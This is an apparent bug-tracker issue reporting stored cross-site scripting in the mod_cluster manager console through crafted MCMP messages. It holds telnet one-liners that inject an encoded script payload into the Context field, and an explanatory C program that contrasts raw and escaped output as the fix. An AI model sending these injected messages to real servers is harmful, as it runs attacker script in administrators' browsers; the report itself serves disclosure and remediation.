mod_cluster / MODCLUSTER-453

It is possible to inject JavaScript into mod_cluster manager console via MCMP messages

    Details

      Description

      This is a nasty one indeed

      Steps to reproduce

      • start Apache HTTP Server with mod_cluster
      • send these messages (provided your test instance listens on 127.0.0.1)
        { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
        { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
        
      • Open http://localhost:6666/mod_cluster_manager and enjoy the JavaScript alert() pop-up being executed.

      Impact

      • Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come could send these messages and execute arbitrary JavaScript code.

      Suggestion

      • Leverage apr_escape* to sanitize MCMP messages.
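      An added example (written for this page, not mod_cluster or APR code) of the two steps behind the report: the MCMP body is percent-decoded as a whole and then split into fields, and the manager console later writes the Context field into the page. Because the script runs in the browser of whoever opens mod_cluster_manager, this is stored XSS against the console's viewers, and the fix belongs at the point where the value is written into HTML, which is what the apr_escape* suggestion amounts to. The decoder, splitter and html_escape() below are stand-alone re-implementations of that shape, kept free of APR so they build with only the C standard library; they are not the real mod_manager or apr_escape_entity() functions. The field names and the sample body come from the reproduction above; the buffer sizes, the MAX_PAIRS limit and the <td> cell layout are assumptions.

```c
/* Added example for MODCLUSTER-453, not mod_cluster or APR code. Models how the MCMP
 * body is percent-decoded, split into key/value pairs, and how the Context value then
 * reaches HTML: escape=0 writes it raw (the reported behaviour), escape=1 entity-escapes
 * it with html_escape(), a stand-in written here for apr_escape_entity(). */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PAIRS 16 /* assumed limit for this example */
struct kv { const char *key; const char *val; };

static int hexval(char c) {
    const char *hex = "0123456789abcdef", *p = c ? strchr(hex, tolower((unsigned char)c)) : NULL;
    return p ? (int)(p - hex) : -1;
}

/* Percent-decode in place ('+' -> ' '); a malformed %XX is kept verbatim. Decoding the whole
 * buffer before splitting is why the fully encoded body in the reproduction is accepted. */
static void url_decode(char *s) {
    char *out = s;
    for (; *s; s++) {
        if (*s == '%' && hexval(s[1]) >= 0 && hexval(s[2]) >= 0) {
            *out++ = (char)(hexval(s[1]) * 16 + hexval(s[2])); s += 2;
        } else {
            *out++ = (*s == '+') ? ' ' : *s;
        }
    }
    *out = '\0';
}

/* Split "k=v&k=v" in place; returns the number of pairs stored. */
static int split_pairs(char *body, struct kv *pairs, int max) {
    int n = 0;
    for (char *tok = body; tok && *tok && n < max; n++) {
        char *amp = strchr(tok, '&');
        if (amp) *amp++ = '\0';
        char *eq = strchr(tok, '=');
        if (eq) *eq = '\0';
        pairs[n].key = tok;
        pairs[n].val = eq ? eq + 1 : "";
        tok = amp;
    }
    return n;
}

/* MCMP field names are matched case-insensitively. */
static const char *lookup(const struct kv *pairs, int n, const char *key) {
    for (int i = 0; i < n; i++) {
        const char *a = pairs[i].key, *b = key;
        while (*a && *b && tolower((unsigned char)*a) == tolower((unsigned char)*b)) a++, b++;
        if (!*a && !*b) return pairs[i].val;
    }
    return NULL;
}

/* Entity-escape & < > " ' into a malloc'd string: a local stand-in for apr_escape_entity(),
 * with the apostrophe added so the value is also safe inside single-quoted attributes. */
static char *html_escape(const char *s) {
    char *out = malloc(strlen(s) * 6 + 1), *o = out; /* worst case: every byte -> "&quot;" */
    if (!out) return NULL;
    for (; *s; s++) {
        switch (*s) {
        case '&':  o += sprintf(o, "&amp;");  break;
        case '<':  o += sprintf(o, "&lt;");   break;
        case '>':  o += sprintf(o, "&gt;");   break;
        case '"':  o += sprintf(o, "&quot;"); break;
        case '\'': o += sprintf(o, "&#39;");  break;
        default:   *o++ = *s;
        }
    }
    *o = '\0';
    return out;
}

/* Render the Context cell of the manager console for one ENABLE-APP body as a malloc'd
 * string. escape=0 reproduces the vulnerable output, escape=1 the fixed output. On
 * allocation failure it returns NULL instead of falling back to the raw value. */
static char *render_context_cell(const char *raw_body, int escape) {
    char body[512];
    struct kv pairs[MAX_PAIRS];
    snprintf(body, sizeof body, "%s", raw_body);
    url_decode(body);
    const char *ctx = lookup(pairs, split_pairs(body, pairs, MAX_PAIRS), "Context");
    if (!ctx) ctx = "";
    char *shown = NULL;
    if (escape && !(shown = html_escape(ctx))) return NULL;
    const char *text = shown ? shown : ctx;
    char *cell = malloc(strlen(text) + sizeof "<td></td>");
    if (cell) sprintf(cell, "<td>%s</td>", text);
    free(shown);
    return cell;
}

/* Constructed sample: the ENABLE-APP body from the reproduction above. */
static const char *SAMPLE_BODY =
    "JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E";

int main(void) {
    char *bad = render_context_cell(SAMPLE_BODY, 0), *good = render_context_cell(SAMPLE_BODY, 1);
    printf("raw:     %s\nescaped: %s\n", bad ? bad : "(null)", good ? good : "(null)");
    free(bad); free(good);
    return 0;
}
```

      Build with a plain cc and run: with escape=0 the cell carries the decoded <script> element verbatim, with escape=1 it carries &lt;script&gt; and the browser shows the text instead of executing it. The same escaping has to be applied to every MCMP-supplied string the console prints, not only Context, since the payload can be placed in any field that is echoed back.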

      Proposed patch

          Attachments

          1. MODCLUSTER-453_master-better_one.patch
            8 kB
          2. MODCLUSTER-453_master-mbabacek.patch
            1 kB
          3. MODCLUSTER-453_master-offensive_approach.patch
            5 kB
          4. patch.new.best.patch
            1 kB
          5. patch.new.txt
            0.7 kB
          6. patch.txt
            0.6 kB

              People

              • Assignee: jfclere Jean-Frederic Clere
              • Reporter: mbabacek Michal Karm
              • Votes: 0
              • Watchers: 4
